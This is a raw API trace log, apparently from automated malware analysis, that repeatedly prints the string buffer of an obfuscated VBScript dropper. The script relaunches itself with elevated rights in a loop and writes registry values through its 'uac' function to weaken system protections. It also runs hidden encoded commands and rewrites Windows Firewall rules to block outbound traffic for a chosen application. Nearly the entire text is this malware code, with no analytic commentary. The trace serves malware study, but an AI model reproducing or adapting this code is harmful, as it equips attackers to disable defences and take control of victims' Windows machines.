(fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.339] wcsncmp (_String1="m rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0226.339] wcsncmp (_String1=" rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.339] wcsncmp (_String1="rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.339] wcsncmp (_String1="ules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.339] wcsncmp (_String1="les\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite 